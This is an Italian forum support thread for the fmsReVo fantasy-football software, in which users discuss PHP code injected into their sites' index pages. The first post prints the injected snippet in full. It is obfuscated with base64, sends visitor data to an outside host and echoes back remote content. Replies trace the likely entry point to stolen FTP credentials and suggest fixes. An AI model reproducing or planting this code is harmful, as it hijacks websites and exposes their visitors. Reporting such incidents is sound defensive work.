Messaggi senza risposta | Argomenti attivi

Indice » Supporto fmsReVo » ReVo - Assistenza » Supporto

Tutti gli orari sono UTC + 1 ora [ ora legale ]



Apri un nuovo argomento Rispondi all’argomento  Pagina 1 di 1
  [ 10 messaggi ] 
  Stampa pagina Precedente | Successivo 
Autore Messaggio
eL Pitu iL PuFFo
MessaggioInviato: 31/03/2012, 9:44 
Io so!
Io so!
Avatar utente

Iscritto il: 29/09/2010, 17:44
Messaggi: 685
Località: Castelnuovo della Daunia (FG)
Questa mattina ho avuto il problema della pagina bianca, ho subito controllato quelli che potevano essere i problemi e ho scoperto che nella pagina index di tutti i miei siti (2 su altervista e 1 su hosting a pagamento .it) ho trovato una stringa di codice che non c'entra nulla con ReVo, premetto che se su uno avevo un contatore che ora ho eliminato sugli altri non li avevo ma ho trovato lo stesso codice!

Questo:

Codice:
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>


Da cosa può dipendere la generazione di questo codice?

_________________
Immagine

http://fantascalzi.fmsrevo.it
Top
Non connesso Profilo  
 
puffin
MessaggioInviato: 31/03/2012, 11:03 
Amministratore
Amministratore
Avatar utente

Iscritto il: 15/09/2010, 12:45
Messaggi: 5130
C'è stato un altro caso.
Praticamente potrei dire che hanno hackerato il sito, a me è successo diverse volte su siti con blog Wordpress (e se succede sul collaudatissimo WP...) il problema è che se non sappiamo da che parte entrano non possiamo prendere alcuna contromisura. :(

Unica soluzione, per ora: togli tutti i permessi di scrittura ai file sotta la root, salvo poi ricordarti di assegnarli quando procederai agli aggiornamenti automatici (senno' non vanno)

_________________
PER FAVORE: Non chiedetemi supporto via mp (non risponderei) utilizzate il forum dove le risposte alle vostre domande posso aiutare anche altri utenti.
Top
Non connesso Profilo  
 
mastrolegachigi
MessaggioInviato: 31/03/2012, 19:02 
So cos'è!
So cos'è!
Avatar utente

Iscritto il: 05/11/2011, 19:12
Messaggi: 46
anche a me oggi da lo stesso problema, se vi ricordate avevo anche postato il problema della pagina bianca la settimana scorsa, cosa che mi sembrava molto strana e forse è proprio il motivo di questo post che non avevamo chiarito, nel senso che il mio problema si era verificato il sabato, visto che fino al venerdì il sito funzionava tutto, e che l'unica modifica da me fatta era stato l'aggiornamento della giornata il martedì precedente.
quindi tutto bene dal martedì al sabato mattina e poi il sabato pomeriggio sparisce tutto.
oggi invece ci ha fatto inviare tutte le formazioni, alcuni sono riusciti aanche stampare le loro di formazioni, ma da circa un'ora ricompare il solito problema della pagina bianca.
[url]mastrolegachigi.altervista.org/index.php[/url]

_________________
http://mastrolegachigi.altervista.org/
Top
Non connesso Profilo  
 
puffin
MessaggioInviato: 31/03/2012, 21:21 
Amministratore
Amministratore
Avatar utente

Iscritto il: 15/09/2010, 12:45
Messaggi: 5130
mastrolegachigi ha scritto:
anche a me oggi da lo stesso problema...


Che significa? Anche tu hai del codice in più nella tua pagina index? Se la risposta è si, sopra ho scritto cause, concause e soluzione che non potrà essere diversa finchè non si scopre di più sul fatto.

Facci sapere se la soluzione di cui sopra funziona.

_________________
PER FAVORE: Non chiedetemi supporto via mp (non risponderei) utilizzate il forum dove le risposte alle vostre domande posso aiutare anche altri utenti.
Top
Non connesso Profilo  
 
eL Pitu iL PuFFo
MessaggioInviato: 31/03/2012, 22:04 
Io so!
Io so!
Avatar utente

Iscritto il: 29/09/2010, 17:44
Messaggi: 685
Località: Castelnuovo della Daunia (FG)
Io dopo aver risistemato il codice della Index ho impostato tutti i file nella root principale "non scrivibili" così come tutti i file della cartella "Home" e tutte le cartelle ma non i file al suo interno! ora sono alcuni a 444 e altri 555

_________________
Immagine

http://fantascalzi.fmsrevo.it
Top
Non connesso Profilo  
 
puffin
MessaggioInviato: 01/04/2012, 0:20 
Amministratore
Amministratore
Avatar utente

Iscritto il: 15/09/2010, 12:45
Messaggi: 5130
eL Pitu iL PuFFo ha scritto:
Io dopo aver risistemato il codice della Index ho impostato tutti i file nella root principale "non scrivibili" così come tutti i file della cartella "Home" e tutte le cartelle ma non i file al suo interno! ora sono alcuni a 444 e altri 555


Occhio, i files e le dir che il wizard richiede come scrivibili lasciali tali altrimenti revo non funzionerà di suo. (Questo non dovrebbe creare problemi perchè sono solo dir e files con "dati").

_________________
PER FAVORE: Non chiedetemi supporto via mp (non risponderei) utilizzate il forum dove le risposte alle vostre domande posso aiutare anche altri utenti.
Top
Non connesso Profilo  
 
puffin
MessaggioInviato: 01/04/2012, 0:23 
Amministratore
Amministratore
Avatar utente

Iscritto il: 15/09/2010, 12:45
Messaggi: 5130
Leggete un pò qui: http://www.couchcms.com/forum/viewtopic ... 3&start=10

Sembra che sia una sorta di Hack e da quello che sta scritto sembra passi via FTP!!!!

Entrambi usate per caso Filezilla?

Cambiate le pwd di accesso FTP e client FTP e vedete se succede ancora.

_________________
PER FAVORE: Non chiedetemi supporto via mp (non risponderei) utilizzate il forum dove le risposte alle vostre domande posso aiutare anche altri utenti.
Top
Non connesso Profilo  
 
eL Pitu iL PuFFo
MessaggioInviato: 01/04/2012, 10:34 
Io so!
Io so!
Avatar utente

Iscritto il: 29/09/2010, 17:44
Messaggi: 685
Località: Castelnuovo della Daunia (FG)
Si io personalmente lo uso! Ma dopo aver letto quel problema cambierò Client sicuramente!

Per quel che ho potuto capire è un problema abbastanza vecchio! Risale al 2008 e riguarda una NON decriptazione delle password che memorizza FileZilla, ma a questo punto m i chiedo che "Client FTP" sicuro usare?

Leggevo che la versione 2.0 non ha questo problema, e che non conviene salvare i siti nel manager interno, ma ricordarsi tutti i dati a memoria!

Non credo che cambiando la password si riesca a risolvere perchè se lo si utilizza rimemorizza la nuova password!

Credo che tutti coloro che utilizzano anche raramente filezilla e che salvano i dati del sito per non inserirli ogni volte che accedono tramite FTP sono a richio di questo hack, sarebbe bene cercare un buon Client FTP che abbia una maggiore sicurezza a livello di dati salvati!

_________________
Immagine

http://fantascalzi.fmsrevo.it
Top
Non connesso Profilo  
 
puffin
MessaggioInviato: 01/04/2012, 12:25 
Amministratore
Amministratore
Avatar utente

Iscritto il: 15/09/2010, 12:45
Messaggi: 5130
Posso chiedere una cortesia a voi che avete avuto questo problema?

Al fine di assicurarci definitivamente che la causa sia quella esposta, visto che ormai sapete anche come rimediare, vi chiedere di lasciare i permessi di scritture come li avete sempre avuti ma di cambiare dati di accesso FTP e cambiare Client.

Fatto questo, se riportate l'esito positivo o negativo, penso che fare un bel servizio a tutta la comunità.

Grazie

_________________
PER FAVORE: Non chiedetemi supporto via mp (non risponderei) utilizzate il forum dove le risposte alle vostre domande posso aiutare anche altri utenti.
Top
Non connesso Profilo  
 
mastrolegachigi
MessaggioInviato: 01/04/2012, 13:46 
So cos'è!
So cos'è!
Avatar utente

Iscritto il: 05/11/2011, 19:12
Messaggi: 46
buongiorno ragazzi.
ho letto tutto il post e ora mi metto all'opera.
cercherò di fare tutte le procedure che avete chiesto per vedere quale funziona sicuramente, l'unica cosa certa è che succede sempre di sabato.
ora faccio tutti i tentativi, a partire dalla prova del 9 e poi vi faccio sapere.
buona domenica a tutti

_________________
http://mastrolegachigi.altervista.org/
Top
Non connesso Profilo  
 
Visualizza ultimi messaggi:  Ordina per  
Apri un nuovo argomento Rispondi all’argomento  Pagina 1 di 1
  [ 10 messaggi ] 

Indice » Supporto fmsReVo » ReVo - Assistenza » Supporto

Tutti gli orari sono UTC + 1 ora [ ora legale ]

Chi c’è in linea

Visitano il forum: Nessuno e 18 ospiti

Non puoi aprire nuovi argomenti
Non puoi rispondere negli argomenti
Non puoi modificare i tuoi messaggi
Non puoi cancellare i tuoi messaggi

Cerca per:
Vai a:  
cron
Powered by phpBB® Forum Software © phpBB Group
Theme created StylerBB.net & kodeki
Traduzione Italiana phpBBItalia.net basata su phpBB.it 2010